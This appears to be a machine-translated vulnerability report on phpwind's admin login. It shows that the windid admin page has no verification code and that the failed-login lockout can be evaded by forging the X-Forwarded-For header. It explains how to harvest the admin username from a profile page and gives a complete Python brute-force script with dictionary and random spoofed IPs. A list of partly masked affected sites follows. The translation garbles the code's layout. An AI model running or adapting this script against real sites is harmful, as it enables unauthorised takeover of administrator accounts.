Phpwind background account password can be cracked and verification code can be ignored
Let's take a look at the official website.
Http://www.phpwind.net/admin.php
Verification code available
Then let's take a look.
Http://www.phpwind.net/windid/admin.php
The verification code is missing.
Then I set up phpwind on the Virtual Machine (the verification code is disabled by default ,)
Http: // 192.168.1.117/windid/admin. php
No verification code
Then, log on to the account and password at this URL.
After successful login, open http: // 192.168.1.117/admin. php
It is also the logon status.
But if it is cracked normally, an error will be prompted eight times.
However, the test finds that X-Forwarded-For is used to determine the source ip address.
In this way, you can modify xff to crack it.
To crack the password, you must know his account,
There are many ways to obtain the administrator account. Here is a simple method.
We can get it in the personal space. (This method will not work if this id is deleted .)
Http: // 192.168.1.117/index. php? M = space & uid = 1
The brute-force cracking program code is as follows:
<Poc> # coding: utf-8import httplib, re, random, urllib, timefrom sys import argv # crack def getHtml (host, username, password): ip = str (random. randint (1,100) + ". "+ str (random. randint (100,244) + ". "+ str (random. randint (100,244) + ". "+ str (random. randint (100,244) postHead = {"Host": host, "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv: 33.0) gecko/20100101 Firefox/33.0 "," X-Forwarded-For ": ip, 'content-type': 'applicat Ion/x-www-form-urlencoded ', 'accept': 'text/html, application/xhtml + xml, application/xml; q = 0.9 ,*/*; q = 0.8 ', 'connection': 'Keep-alive', 'cookies ': 'csrf _ token = wooyun '} postContent = 'username =' + username + '& password =' + password + '& submit = & csrf_token = wooyun' resultHtml = httplib. HTTPConnection (host, 80, False) resultHtml. request ('post', '/windid/admin. php? A = login', body = postContent, headers = postHead) page = resultHtml. getresponse () pageConect = page. read () return pageConect # Get formhash and seccodehiddendef getusername (host): url = 'HTTP: // '+ host +'/index. php? M = space & uid = 1' pageContent = urllib. urlopen (url ). read () r1 = re. compile ('"> (\ S {1, 30}) personal space </a>') username = r1.findall (pageContent) [0] return username # obtain the host dictionary interval through argv for blasting if (len (argv) = 1 ): print '----> python' + argv [0] + 'host address dictionary file interval 'print' ----> python' + argv [0] + '192.168.1.105 pass.txt 0.2' else: host = argv [1] passfile = argv [2] sleeptime = argv [3] print 'website host is '+ hostprint'. The password dictionary is '+ passfileprint'. The interval is '+ sleeptimeprint. '---> 'username = getusername (host) f = open (passfile, 'R') htmlpass = f. read (). split ('\ r \ n') f. close () userpass = [username + '000000', username + '000000', username + username, username + '.. ', username + '. ', username + 'admin888', username + 'admin123', username + 'admin', username + '000000'] htmlpass = userpass + htmlpassfor I in range (len (htmlpass )): time. sleep (float (sleeptime) print 'attempt password' + htmlpass [I] if (getHtml (host, username, htmlpass [I]) = ''): print 'account is '+ usernameprint' password is '+ htmlpass [I] break </poc>
Demo
The following are several cases
***** admin ********** admin **********cn adm**********n.com ad********** admin *****
Solution:
Enhanced verification